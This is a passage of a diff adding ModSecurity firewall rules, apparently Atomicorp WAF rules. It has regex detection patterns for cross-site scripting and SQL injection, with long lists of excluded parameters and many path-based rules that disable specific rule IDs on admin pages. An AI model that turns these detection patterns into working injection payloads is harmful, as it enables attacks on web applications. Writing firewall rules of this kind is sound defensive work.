+SecRule REQUEST_URI|ARGS|!ARGS:cache|!ARGS:_module|!ARGS:_op|!ARGS:title|!ARGS:desc|!ARGS:news|!ARGS:expiry|!ARGS:domain|!ARGS:/description/|!ARGS:eip_value|!ARGS:/^usergroup/|!ARGS:sendDescription|!ARGS:email_id|!ARGS:obj_itop|!ARGS:pay_inst_1|!ARGS:sml_prt_1|!ARGS:/^jform/|!ARGS:route|!ARGS:token|!ARGS:/^mymodule/|!ARGS:phpcode|!ARGS:intro|!ARGS:/product_benefits/|!ARGS:Snippet|!ARGS:_qf_Select_next|!ARGS:move2|!ARGS:oid|!ARGS:Submit2|!ARGS:/^obj_/|!ARGS:layout|!ARGS:pageset|!ARGS:contact_form_information|!ARGS:input[Desarrollo]|!ARGS:/^site_/|!ARGS:/^translations/|!ARGS:login_form|!ARGS:create_tables|!ARGS:insertfile|!ARGS:bbcode_tpl|!ARGS:embedVideo|!ARGS:move2|!ARGS:hoperation|!ARGS:mentorhelp|!ARGS:/custom_code/|!ARGS:arg2|!ARGS:resumoDetalhe|!ARGS:Right_photo_1|!ARGS:/^K2ExtraField/|!ARGS:/submitcode/|!ARGS:beschrijving|!ARGS:custombannercode|!ARGS:bannercode|!ARGS:privatecapacity|!ARGS:diz|!ARGS:FormLayout|!ARGS:parent_name|!ARGS:/^fck/|!ARGS:/^code_tscript/|!ARGS:_qf_Group_next|!ARGS:project_company|!ARGS:mes|!ARGS:signature|!ARGS:/quote/|!ARGS:paepdc|!ARGS:/quote/|!ARGS:/print/|!ARGS:/VB_announce/|!ARGS:/^autoDS/|!ARGS:newyddionc|!ARGS:/serendipity/|!ARGS:omschrijving|!ARGS:resolution|!ARGS:bericht|!ARGS:property_copy|!ARGS:/^outpay/|!ARGS:s_query|!ARGS:bedrijfsprofiel|!ARGS:finish_survey|!ARGS:embeddump|!ARGS:photolater|!ARGS:/element/|!ARGS:ticket_response|!ARGS:option[vbpclosedreason]|!ARGS:/introduction/|!ARGS:/contenido/|!ARGS:/tekst/|!ARGS:/sql/|!ARGS:prefix|!ARGS:query|!ARGS:c_features|!ARGS:other_clubs|!ARGS:/^elm/|!ARGS:/^saes/|!ARGS:verbiage|!ARGS:dlv_instructions!ARGS:/^cymr/|!ARGS:_qf_Register_upload|!ARGS:/^wz/|!ARGS:tiny_vals|!ARGS:sSave|!ARGS:/article/|!ARGS:/about/|!ARGS:/^elm/|!ARGS:news|!ARGS:/Summarize/|!ARGS:usr1|!ARGS:resolution|!ARGS:problem|!ARGS:/^product_options/|!ARGS:eintrag|!ARGS:/edit/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:Returnid|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:order|!ARGS:youtube|!ARGS:business|!ARGS:/homePage/|!ARGS:/post/|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:meta_info|!ARGS:ta|!ARGS:/data/|!ARGS:search_theme_form_keys|ARGS_NAMES|!ARGS_NAMES:user[click_or_onmouseover]|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/note/|!ARGS:/xml/|!ARGS:/^doc/|!ARGS:tekst|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:/submit/|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?(?:(?:img|i?frame) ?src|a ?href) ?= ?(?:ogg|tls|ssl|gopher|file|data|php|zlib|zip|glob|s3|phar|rar|s(?:sh2?|cp)|dict|expect|(?:ht|f)tps?):/|\" ?> ?<|(?:\.add|\@)import|asfunction\:|background-image\:|e(?:cma|xec)script|\.fromcharcode|get(?:parentfolder|specialfolder)|\.innerhtml|\< ?input|(?:java|live|j|vb)script!s|lowsrc|mocha\:|!(i|t)on(?:abort|blur|change|click!s|dragdrop|focus|keydown|keypress|keyup)|onmouse(?:down|move|out|over|up)|shell\:|window\.location|asfunction:_root\.launch|\%env)" 	"phase:2,deny,log,auditlog,status:403,chain,t:none,t:removeNulls,t:urlDecodeUni,t:replaceComments,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,capture,id:341149,rev:112,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack',logdata:'%{TX.0}'"
+SecRule ARGS "!(^(submit(\+| )>>|>>)$)" "t:none,t:lowercase"
+
+SecMarker END_RULES_91466
+
+SecRule REQUEST_FILENAME "/cgi-bin/cp-admin\.cgi" "phase:2,id:91467,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/_admin/" "phase:2,id:91468,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340006,ctl:ruleRemovebyID=340007,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/siteadmin/" "phase:2,id:91469,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/cmsadmin/" "phase:2,id:91470,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/forumadmin/" "phase:2,id:91471,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/management/" "phase:2,id:91472,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/manager/" "phase:2,id:91473,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/edit_product" "phase:2,id:91474,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/rssadmin/" "phase:2,id:91475,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/order/input\.php" "phase:2,id:91476,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91477,t:none,pass,nolog,skipAfter:END_RULES_91477"
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/page/|!ARGS:order|!ARGS:youtube|!ARGS:reply|!ARGS:/^B/|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/product_desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:/descr/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:htmlEntityDecode,t:compressWhitespace,t:lowercase,id:341823,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:/^B/|!ARGS:order|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:/page/|!ARGS:/homePage/|!ARGS:Post|!ARGS:area|!ARGS:/^field_id/|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/product_desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:googlemap|!ARGS:/descr/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/  "(< ?((img|i?frame) ?src|a ?href) ?= ?(ogg|tls|ssl|gopher|zlib|(ht|f)tps?):/|alert ?\(|<? ((java|vb)?script|applet|activex|chrome) ?>|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?>|< ?/?i?frame)" 	"phase:2,deny,log,auditlog,status:403,multiMatch,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340824,rev:33,severity:2,msg:'Atomicorp.com WAF Rules: Cross Site Scripting Attack'"
+
+SecMarker END_RULES_91477
+
+SecRule REQUEST_FILENAME "/ftp/index\.php" "phase:2,id:91478,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340144"
+SecAction "phase:2,id:91479,t:none,pass,nolog,skipAfter:END_RULES_91479"
+
+SecRule ARGS|!ARGS:state|!ARGS:postpagetext|!ARGS:display_query|!ARGS:Db_submit|!ARGS:prev_sql_query|!ARGS:sql_query|!ARGS:Post|!ARGS:text|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:message|!ARGS:/^SQL/|!ARGS:query_string|!ARGS:query|!ARGS:description "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=)"  	"t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,phase:2,deny,log,auditlog,status:403,id:340825,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2'"
+
+SecMarker END_RULES_91479
+
+SecRule REQUEST_FILENAME "/editfield\.php" "phase:2,id:91480,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin1/" "phase:2,id:91481,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/edit/index\.php" "phase:2,id:91482,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/ticketreply\.php" "phase:2,id:91483,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149,ctl:ruleRemovebyID=340144"
+SecAction "phase:2,id:91484,t:none,pass,nolog,skipAfter:END_RULES_91484"
+
+SecRule ARGS|!ARGS:reply|!ARGS:postpagetext|!ARGS:display_query|!ARGS:Db_submit|!ARGS:prev_sql_query|!ARGS:sql_query|!ARGS:Post|!ARGS:text|!ARGS:action|!ARGS:op|!ARGS:setup_db|!ARGS:wptextbox1|!ARGS:message|!ARGS:/^SQL/|!ARGS:query_string|!ARGS:query|!ARGS:description "(?:(?:alter|create|drop)[[:space:]]*(?:column|database|procedure|table)|delete[[:space:]]*update.+set.+=|union all select |union select [a-z][0-9]+ )"  	"phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:340852,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection 2'"
+
+SecMarker END_RULES_91484
+
+SecRule REQUEST_FILENAME "/tiny_mce/plugins/advlink/link\.htm" "phase:2,id:91485,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/webadmin/" "phase:2,id:91486,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/front_content\.php" "phase:2,id:91487,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/main/" "phase:2,id:91488,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340017"
+
+SecRule REQUEST_FILENAME "/install/" "phase:2,id:91489,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/formmail\.conf" "phase:2,id:91490,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=340017"
+SecAction "phase:2,id:91491,t:none,pass,nolog,skipAfter:END_RULES_91491"
+
+SecRule ARGS|!ARGS:CompanyType|!ARGS:ncontent|!ARGS:/body/|!ARGS:/content/|!ARGS:searchword|!ARGS:add_keywords|!ARGS:comments|!ARGS:text|!ARGS:/description/|!ARGS:/^sql/|!ARGS:/products_description/|!ARGS:contactMessage|!ARGS:cts|!ARGS:meta_descr|!ARGS:text|!ARGS:edited|!ARGS:content|!ARGS:description|!ARGS:introtext|!ARGS:Post|!ARGS:sql_query|!ARGS:itembigtext|!ARGS:article_content|!ARGS:body|!ARGS:mytextarea|!ARGS:ll_content_message|!ARGS:page-content|!ARGS:reply|!ARGS:xml|!ARGS:content_en|!ARGS:filecontent|!ARGS:message|!ARGS:content_en|!ARGS:general[description]|!ARGS:response[14]|!ARGS:article|!ARGS:wptextbox1 "(?:insert into values|select from [a-z|0-9]|bulk insert |union select |union all select|convert \(.*from)"  	"t:none,t:urlDecodeUni,t:compressWhitespace,t:lowercase,phase:2,deny,log,auditlog,status:403,id:340826,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic SQL injection protection in ARGS'"
+
+SecMarker END_RULES_91491
+
+SecRule REQUEST_FILENAME "/wizard/pages" "phase:2,id:91492,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+
+SecRule REQUEST_FILENAME "/admin/email\.php" "phase:2,id:91493,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340009"
+
+SecRule REQUEST_FILENAME "/dict\.php" "phase:2,id:91494,t:none,t:lowercase,pass,nolog,noauditlog,skip:1,ctl:ruleRemovebyID=333140,ctl:ruleRemovebyID=340147,ctl:ruleRemovebyID=340130,ctl:ruleRemovebyID=333141,ctl:ruleRemovebyID=350147,ctl:ruleRemovebyID=393655,ctl:ruleRemovebyID=342259,ctl:ruleRemovebyID=331025,ctl:ruleRemovebyID=350148,ctl:ruleRemovebyID=350149,ctl:ruleRemovebyID=340148,ctl:ruleRemovebyID=340149"
+SecAction "phase:2,id:91495,t:none,pass,nolog,skipAfter:END_RULES_91495"
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:request|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:340827,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:request|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:removeNulls,t:htmlEntityDecode,t:lowercase,t:compressWhitespace,id:340828,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
+
+SecMarker END_RULES_91495
+
+SecRule REQUEST_FILENAME "/webadmin\.php" "phase:2,id:91496,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340161"
+
+SecRule REQUEST_FILENAME "/ntunnel_mysql\.ph" "phase:2,id:91497,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=340144,ctl:ruleRemovebyID=380020,ctl:ruleRemovebyID=380019"
+
+
+SecRule REQUEST_FILENAME "/planner\.php" "phase:2,id:91498,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:91499,t:none,pass,nolog,skipAfter:END_RULES_91499"
+
+SecRule REQUEST_URI|ARGS|ARGS_NAMES|!ARGS:title|!ARGS:request|!ARGS:/^product_options/|!ARGS:/SiteStructure/|!ARGS:/anmerkung/|!ARGS:/summary/|!ARGS:/edit/|!ARGS:reply|!ARGS:/story/|!ARGS:resource_box|!ARGS:navig|!ARGS:preview__hidden|!ARGS:/page/|!ARGS:order|!ARGS:/post/|!ARGS:youtube|!ARGS:reply|!ARGS:business|!ARGS:/homePage/|!ARGS:pagimenu_inhoud|!ARGS:/note/|!ARGS:Post|!ARGS:/^field_id/|!ARGS:area|!ARGS:/detail/|!ARGS:/comment/|!ARGS:LongDesc|!ARGS:/desc/|!ARGS:ta|!ARGS:/data/|!ARGS:Returnid|!ARGS:busymess|!ARGS_NAMES:/^V\*/|!ARGS_NAMES:/^S\*/|!ARGS:/^quickrise_advertise/|!ARGS:rt_xformat|!ARGS:/wysiwyg/|!ARGS:contingut|!ARGS:/^werg/|!ARGS:/body/|!ARGS:/submit/|!ARGS:/css/|!ARGS:/^section/|!ARGS:/msg/|!ARGS:t_cont|!ARGS:/^doc/|!ARGS:/xml/|!ARGS:tekst|!ARGS:formsubmit|!ARGS:invoice_snapshot|!ARGS:/code/|!ARGS:submit|!ARGS:/message/|!ARGS:/html/|!ARGS:/content/|!ARGS:/footer/|!ARGS:/header/|!ARGS:/link/|!ARGS:/text/|!ARGS:/txt/|!ARGS:/url/|!ARGS:lnk|!ARGS:/gplus/|!ARGS:/pinterest/|!ARGS:/redirect/|!ARGS:/refer/|!ARGS:/referrer/|!ARGS:/template/|!ARGS:/ajax/ "(< ?(?:script|about|applet|activex|chrome).*(?:script|about|applet|activex|chrome) ?>|> ?< ?(img ?src|a ?href) ?= ?(ht|f)tps?:/|\" ?> ?<|\" ?[a-z]+ ?<.*>|> ?\"? ?(>|<)|< ?/?i?frame)"  	"phase:2,deny,log,auditlog,status:403,t:none,t:htmlEntityDecode,t:lowercase,t:replaceNulls,t:compressWhitespace,id:340829,rev:1,severity:2,msg:'Atomicorp.com WAF Rules: Generic XSS filter'"
